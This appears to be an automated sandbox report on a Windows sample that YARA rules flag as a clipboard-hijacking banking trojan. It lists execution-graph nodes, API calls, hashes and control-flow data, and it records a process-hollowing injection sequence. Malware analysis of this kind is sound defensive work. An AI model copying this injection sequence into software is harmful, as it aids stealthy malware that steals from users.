                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:44.7%
                                                                                                                                        Total number of Nodes:38
                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                        execution_graph 34218 4415026 34219 4415035 34218->34219 34222 44157c6 34219->34222 34225 44157e1 34222->34225 34223 44157ea CreateToolhelp32Snapshot 34224 4415806 Module32First 34223->34224 34223->34225 34226 4415815 34224->34226 34227 441503e 34224->34227 34225->34223 34225->34224 34229 4415485 34226->34229 34230 44154b0 34229->34230 34231 44154c1 VirtualAlloc 34230->34231 34232 44154f9 34230->34232 34231->34232 34232->34232 34233 5dc0000 34236 5dc0630 34233->34236 34235 5dc0005 34237 5dc064c 34236->34237 34239 5dc1577 34237->34239 34242 5dc05b0 34239->34242 34245 5dc05dc 34242->34245 34243 5dc061e 34244 5dc05e2 GetFileAttributesA 34244->34245 34245->34243 34245->34244 34247 5dc0420 34245->34247 34248 5dc04f3 34247->34248 34249 5dc04ff CreateWindowExA 34248->34249 34250 5dc04fa 34248->34250 34249->34250 34251 5dc0540 PostMessageA 34249->34251 34250->34245 34252 5dc055f 34251->34252 34252->34250 34254 5dc0110 VirtualAlloc GetModuleFileNameA 34252->34254 34255 5dc017d CreateProcessA 34254->34255 34256 5dc0414 34254->34256 34255->34256 34258 5dc025f VirtualFree VirtualAlloc Wow64GetThreadContext 34255->34258 34256->34252 34258->34256 34259 5dc02a9 ReadProcessMemory 34258->34259 34260 5dc02e5 VirtualAllocEx NtWriteVirtualMemory 34259->34260 34261 5dc02d5 NtUnmapViewOfSection 34259->34261 34262 5dc033b 34260->34262 34261->34260 34263 5dc039d WriteProcessMemory Wow64SetThreadContext ResumeThread 34262->34263 34264 5dc0350 NtWriteVirtualMemory 34262->34264 34265 5dc03fb ExitProcess 34263->34265 34264->34262

                                                                                                                                        Executed Functions

                                                                                                                                        Function 05DC0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DC0156
                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DC016C
                                                                                                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 05DC0255
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DC0270
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DC0283
                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DC029F
                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DC02C8
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DC02E3
                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DC0304
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DC032A
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DC0399
                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DC03BF
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DC03E1
                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 05DC03ED
                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05DC0412
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 93872480-0
                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                        • Instruction ID: 567f29c3326dd9cc2eb87b9c2dfdb7929acbbb719e2a9827baf16f8c4cfccdff
                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                        • Instruction Fuzzy Hash: F2B1B674A00209EFDB44CF98C895FAEBBB5BF88314F248158E549AB391D771AE41CF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 044157C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 41 44157c6-44157df 42 44157e1-44157e3 41->42 43 44157e5 42->43 44 44157ea-44157f6 CreateToolhelp32Snapshot 42->44 43->44 45 4415806-4415813 Module32First 44->45 46 44157f8-44157fe 44->46 47 4415815-4415816 call 4415485 45->47 48 441581c-4415824 45->48 46->45 52 4415800-4415804 46->52 53 441581b 47->53 52->42 52->45 53->48
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 044157EE
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0441580E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, Offset: 04415000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4415000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: 847668f909dda16440f350ea9d0706a9b261243bb775f895f039832a6989bb20
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 4EF06231200710BFDB203BF5A88DBEFB6E8EF89725F10052AE652911D0DB70F8454661
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 15 5dc0420-5dc04f8 17 5dc04ff-5dc053c CreateWindowExA 15->17 18 5dc04fa 15->18 20 5dc053e 17->20 21 5dc0540-5dc0558 PostMessageA 17->21 19 5dc05aa-5dc05ad 18->19 20->19 22 5dc055f-5dc0563 21->22 22->19 23 5dc0565-5dc0579 22->23 23->19 25 5dc057b-5dc0582 23->25 26 5dc05a8 25->26 27 5dc0584-5dc0588 25->27 26->22 27->26 28 5dc058a-5dc0591 27->28 28->26 29 5dc0593-5dc0597 call 5dc0110 28->29 31 5dc059c-5dc05a5 29->31 31->26
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DC0533
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                        • Instruction ID: 868ab8c69b83ebaab8802383638fd404aa9087d934ef5b0d9ffb16802cc2bdc5
                                                                                                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                        • Instruction Fuzzy Hash: 44511770D08389DBEB11CBA8C849BEDBFB2AF11708F14409DD5446F2C6C3BA5659CB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 32 5dc05b0-5dc05d5 33 5dc05dc-5dc05e0 32->33 34 5dc061e-5dc0621 33->34 35 5dc05e2-5dc05f5 GetFileAttributesA 33->35 36 5dc05f7-5dc05fe 35->36 37 5dc0613-5dc061c 35->37 36->37 38 5dc0600-5dc060b call 5dc0420 36->38 37->33 40 5dc0610 38->40 40->37
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DC05EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                        • Instruction ID: de1b1fd180672ff418fdc65619583be5798b008c36ae073217b7c4d46e37b5dc
                                                                                                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                        • Instruction Fuzzy Hash: 9C011E70C0824DEBDB11DF98C5183AEBFB5AF41308F1480DDC4492B241D7769B58CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 04415485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 54 4415485-44154bf call 4415798 57 44154c1-44154f4 VirtualAlloc call 4415512 54->57 58 441550d 54->58 60 44154f9-441550b 57->60 58->58 60->58
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 044154D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, Offset: 04415000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4415000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 05fb7ca443e762a7e189c886f1d157a52c8ef283c234428c82a52029856908d7
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: F8112B79A00208FFDB01DF99C985E99BBF5AF08350F058095F9489B362D371EA90DB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 05DDF030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 300 5ddf030-5ddf078 call 5df0160 call 5de4914 call 5dcd040 308 5ddf080-5ddf086 300->308 309 5ddf090-5ddf0c2 call 5debdc0 call 5dccea0 308->309 314 5ddf0ce-5ddf112 309->314 315 5ddf0c4-5ddf0c9 309->315 319 5ddf118-5ddf11d 314->319 320 5ddf114-5ddf116 314->320 316 5ddf3bf-5ddf3e0 call 5de4690 315->316 324 5ddf42d-5ddf46c 316->324 325 5ddf3e2-5ddf3e6 316->325 323 5ddf120-5ddf129 319->323 322 5ddf12f-5ddf158 call 5dd6480 call 5de25a2 320->322 341 5ddf15e-5ddf197 call 5dd5030 call 5dce6e0 322->341 342 5ddf222-5ddf285 call 5dd6480 call 5dd4990 call 5dd32a0 call 5dd6370 322->342 323->323 328 5ddf12b-5ddf12d 323->328 361 5ddf48f-5ddf4b2 324->361 362 5ddf46e 324->362 326 5ddf3ec-5ddf401 325->326 327 5ddf7ca-5ddf7da call 5dd24b0 325->327 326->309 336 5ddf407-5ddf428 326->336 337 5ddf7ed-5ddf822 call 5dcf8f0 327->337 338 5ddf7dc-5ddf7df 327->338 328->322 336->309 351 5ddf826-5ddf82c 337->351 338->308 370 5ddf20f-5ddf214 341->370 371 5ddf199-5ddf19e 341->371 399 5ddf287-5ddf290 call 5de2f27 342->399 400 5ddf293-5ddf2b7 342->400 356 5ddf82e-5ddf830 351->356 357 5ddf832-5ddf834 351->357 358 5ddf840-5ddf84f call 5dd4840 356->358 359 5ddf837-5ddf83c 357->359 358->351 386 5ddf851-5ddf883 call 5dcf8f0 358->386 359->359 364 5ddf83e 359->364 368 5ddf4b8-5ddf4bf 361->368 369 5ddf4b4-5ddf4b6 361->369 367 5ddf470-5ddf478 362->367 364->358 376 5ddf48b 367->376 377 5ddf47a-5ddf487 367->377 380 5ddf4c2-5ddf4c7 368->380 379 5ddf4cb-5ddf4ef call 5dd6070 call 5dd32a0 369->379 370->342 378 5ddf216-5ddf21f call 5de2f27 370->378 372 5ddf1ac-5ddf1c7 371->372 373 5ddf1a0-5ddf1a9 call 5de2f27 371->373 383 5ddf1c9-5ddf1cd 372->383 384 5ddf1e2-5ddf1e8 372->384 373->372 376->361 377->367 402 5ddf489 377->402 378->342 407 5ddf4f1 379->407 408 5ddf4f3-5ddf506 379->408 380->380 388 5ddf4c9 380->388 391 5ddf1cf-5ddf1e0 call 5de0f40 383->391 392 5ddf1ee-5ddf20c 383->392 384->392 406 5ddf887-5ddf88d 386->406 388->379 391->392 392->370 399->400 415 5ddf2b9-5ddf2c0 400->415 416 5ddf2e3-5ddf31a 400->416 402->361 410 5ddf88f-5ddf891 406->410 411 5ddf893-5ddf895 406->411 407->408 423 5ddf508-5ddf511 call 5de2f27 408->423 424 5ddf514-5ddf584 call 5de1602 call 5debdc0 call 5de4690 408->424 413 5ddf8a1-5ddf8b0 call 5dd4840 410->413 414 5ddf898-5ddf89d 411->414 413->406 428 5ddf8b2-5ddf8ec call 5dd4990 call 5dd32a0 413->428 414->414 418 5ddf89f 414->418 415->416 419 5ddf2c2-5ddf2ce 415->419 435 5ddf38c-5ddf3a8 416->435 436 5ddf31c-5ddf334 416->436 418->413 425 5ddf2d7 419->425 426 5ddf2d0-5ddf2d5 419->426 423->424 471 5ddf5dd-5ddf637 424->471 472 5ddf586-5ddf58a 424->472 427 5ddf2dc 425->427 426->427 427->416 445 5ddf8ee 428->445 446 5ddf8f0-5ddf908 428->446 451 5ddf3aa-5ddf3b3 call 5de2f27 435->451 452 5ddf3b6-5ddf3b9 435->452 436->435 447 5ddf336-5ddf362 call 5de2a56 436->447 445->446 454 5ddf90a-5ddf913 call 5de2f27 446->454 455 5ddf916-5ddf953 call 5dd4990 call 5dd32a0 446->455 447->435 463 5ddf364-5ddf389 call 5de34a2 call 5de43d8 447->463 451->452 452->316 454->455 473 5ddf955 455->473 474 5ddf957-5ddf966 455->474 463->435 503 5ddf65f-5ddf67d 471->503 504 5ddf639 471->504 472->327 476 5ddf590-5ddf5b1 472->476 473->474 482 5ddf968-5ddf971 call 5de2f27 474->482 483 5ddf974-5ddf980 474->483 476->309 486 5ddf5b7-5ddf5d8 476->486 482->483 488 5ddf98e-5ddf9a8 483->488 489 5ddf982-5ddf98b call 5de2f27 483->489 486->308 493 5ddf9aa-5ddf9b3 call 5de2f27 488->493 494 5ddf9b6 488->494 489->488 493->494 496 5ddf9ba-5ddf9d0 494->496 505 5ddf67f-5ddf681 503->505 506 5ddf683-5ddf68d 503->506 507 5ddf640-5ddf648 504->507 508 5ddf699-5ddf6bb call 5dd6070 call 5dd32a0 505->508 509 5ddf690-5ddf695 506->509 510 5ddf65b 507->510 511 5ddf64a-5ddf657 507->511 519 5ddf6bd 508->519 520 5ddf6bf-5ddf6d5 508->520 509->509 512 5ddf697 509->512 510->503 511->507 516 5ddf659 511->516 512->508 516->503 519->520 522 5ddf6d7-5ddf6e0 call 5de2f27 520->522 523 5ddf6e3-5ddf74b call 5de1602 call 5debdc0 520->523 522->523 534 5ddf74d-5ddf756 523->534 535 5ddf75c-5ddf761 523->535 534->535 543 5ddf7e4-5ddf7e8 534->543 536 5ddf7b0-5ddf7b2 535->536 537 5ddf763-5ddf784 535->537 539 5ddf7bd-5ddf7bf 536->539 540 5ddf7b4-5ddf7ba call 5de158d 536->540 537->309 547 5ddf78a-5ddf7ab 537->547 539->327 542 5ddf7c1-5ddf7c7 call 5de158d 539->542 540->539 542->327 543->496 547->308
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$_free_malloc_strstr$_wcsstr
                                                                                                                                        • String ID: "
                                                                                                                                        • API String ID: 430003804-123907689
                                                                                                                                        • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                                                        • Instruction ID: 3cb3bf5f834c20342457824d770e6b9fb073d57916e5503a66cb43f579a37881
                                                                                                                                        • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                                                        • Instruction Fuzzy Hash: 0442B271508341ABD720EF64CC48BABBBE8BF45304F04492EF58A97291DB75D549CBB2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DDA930 Relevance: 10.3, APIs: 3, Strings: 2, Instructions: 1565COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: <$x2Q
                                                                                                                                        • API String ID: 2102423945-643667464
                                                                                                                                        • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                                                                                                                        • Instruction ID: b0192bffb639a5b83dac9fdaff2af11e378b3c215f852ce2efc4cb878fca9e0a
                                                                                                                                        • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                                                                                                                        • Instruction Fuzzy Hash: 4AD28071608341ABD724EF64DC98BABFBE5FF85304F00492EE48587290DB75A549CBB2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DD00D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                        • Instruction ID: 921975c6ebf7b5d0e8a527b6d7e2f1b91276daaa041c3f91e055b7df0f07cffc
                                                                                                                                        • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                        • Instruction Fuzzy Hash: 97525C71D04208DBDF10DFA8D889BEEBBB5FF44304F14816AD419A7290E775AA49CBB1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCE6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _wcsstr.LIBCMT ref: 05DCE72D
                                                                                                                                        • _wcsstr.LIBCMT ref: 05DCE756
                                                                                                                                        • _memset.LIBCMT ref: 05DCE784
                                                                                                                                          • Part of subcall function 05E0FC0C: std::exception::exception.LIBCMT ref: 05E0FC1F
                                                                                                                                          • Part of subcall function 05E0FC0C: __CxxThrowException@8.LIBCMT ref: 05E0FC34
                                                                                                                                          • Part of subcall function 05E0FC0C: std::exception::exception.LIBCMT ref: 05E0FC4D
                                                                                                                                          • Part of subcall function 05E0FC0C: __CxxThrowException@8.LIBCMT ref: 05E0FC62
                                                                                                                                          • Part of subcall function 05E0FC0C: std::regex_error::regex_error.LIBCPMT ref: 05E0FC74
                                                                                                                                          • Part of subcall function 05E0FC0C: __CxxThrowException@8.LIBCMT ref: 05E0FC82
                                                                                                                                          • Part of subcall function 05E0FC0C: std::exception::exception.LIBCMT ref: 05E0FC9B
                                                                                                                                          • Part of subcall function 05E0FC0C: __CxxThrowException@8.LIBCMT ref: 05E0FCB0
                                                                                                                                        • _wcsstr.LIBCMT ref: 05DCEA0C
                                                                                                                                        • _memset.LIBCMT ref: 05DCEE5C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338678108-0
                                                                                                                                        • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                        • Instruction ID: dc95691f6bafdc710b23a35ab0ead020f1a0e7cb510282a541de0bf9cf4dbe2a
                                                                                                                                        • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                        • Instruction Fuzzy Hash: 8152A2B1A0021A9FCF25DF68C894BAEBFF9FF04300F1445AED446AB281D7319945CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DD0B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                        • Instruction ID: 4971b59318ea55a4c00cf5521e792732f89d520170b946c6bca34cb2b13653f1
                                                                                                                                        • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                        • Instruction Fuzzy Hash: 52424C71E04208DBDB14EFA4C989BEEB7F5FF04308F24416AD416A7290E771AA45CBB5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCDBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                        • Instruction ID: 37f4ad3ad8bd82fefeb19aab5f42751a7fcca34032b22009a031c9ccfcbdb435
                                                                                                                                        • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                        • Instruction Fuzzy Hash: EB525170E0024ADFDB11DBA4C848FAEBBB9FF49704F1481D9E549AB250DB71AD45CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00409018 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,004090AA,00413218,00000001,?,004091C1,00413218,00000017), ref: 0040901D
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00413218,?,004090AA,00413218,00000001,?,004091C1,00413218,00000017), ref: 00409026
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1210537920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1210523224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210556297.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210571846.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210586886.000000000041B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210586886.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210657902.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210657902.000000000409E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1213166908.00000000040A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 28beeca3d6f3d7e4d14661f1268a62793a73c245c08e492e04ea9542e01566da
                                                                                                                                        • Instruction ID: 813572f2ecf1461c1951aa0d3f60b9d03d1e46d2a341b29204beb9faec26f5b3
